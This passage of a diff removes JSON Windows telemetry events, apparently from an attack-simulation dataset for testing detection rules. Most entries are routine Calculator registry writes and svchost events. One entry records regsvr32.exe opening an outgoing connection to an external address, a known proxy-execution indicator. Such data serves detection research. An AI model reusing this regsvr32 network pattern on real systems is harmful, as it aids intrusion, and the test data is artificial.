"ButtonBackgroundColorInactive", - "timestamp": 131883573250259984, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "command_line": "C:\\WINDOWS\\system32\\svchost.exe -k appmodel -p -s camsvc", - "event_type": "process", - "logon_id": 999, - "parent_process_name": "services.exe", - "parent_process_path": "C:\\Windows\\System32\\services.exe", - "pid": 4052, - "ppid": 568, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "subtype": "create", - "timestamp": 131883573250320000, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}", - "unique_ppid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}", - "user": "NT AUTHORITY\\SYSTEM", - "user_domain": "NT AUTHORITY", - "user_name": "SYSTEM" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250259984, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColorInactive", - "registry_value": "ButtonForegroundColorInactive", - "timestamp": 131883573250259984, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "image_load", - "image_name": "svchost.exe", - "image_path": "C:\\Windows\\System32\\svchost.exe", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250259984, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4052, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883573250259984, - "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": 
"Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250420000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColor", - "registry_value": "ButtonBackgroundColor", - "timestamp": 131883573250420000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250420000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": 
"C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColor", - "registry_value": "ButtonForegroundColor", - "timestamp": 131883573250420000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250420000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverBackgroundColor", - "registry_value": "ButtonHoverBackgroundColor", - "timestamp": 131883573250420000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250420000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverForegroundColor", - "registry_value": "ButtonHoverForegroundColor", - "timestamp": 131883573250420000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250420000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedBackgroundColor", - "registry_value": "ButtonPressedBackgroundColor", - "timestamp": 131883573250420000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250420000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedForegroundColor", - "registry_value": 
"ButtonPressedForegroundColor", - "timestamp": 131883573250420000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250420000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColorInactive", - "registry_value": "ButtonBackgroundColorInactive", - "timestamp": 131883573250420000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": 
"C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250420000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColorInactive", - "registry_value": "ButtonForegroundColorInactive", - "timestamp": 131883573250420000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "destination_address": "151.101.48.133", - "destination_port": "443", - "event_type": "network", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "protocol": "tcp", - "source_address": "192.168.162.134", - "source_port": "50505", - "subtype": "outgoing", - "timestamp": 131883573238680000, - 
"unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250580000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColor", - "registry_value": "ButtonBackgroundColor", - "timestamp": 131883573250580000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": 
"C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250580000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColor", - "registry_value": "ButtonForegroundColor", - "timestamp": 131883573250580000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250580000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverBackgroundColor", - "registry_value": "ButtonHoverBackgroundColor", - "timestamp": 131883573250580000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250580000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverForegroundColor", - "registry_value": "ButtonHoverForegroundColor", - "timestamp": 131883573250580000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": 
"Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250580000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonPressedBackgroundColor", - "registry_value": "ButtonPressedBackgroundColor", - "timestamp": 131883573250580000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883573250580000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - 
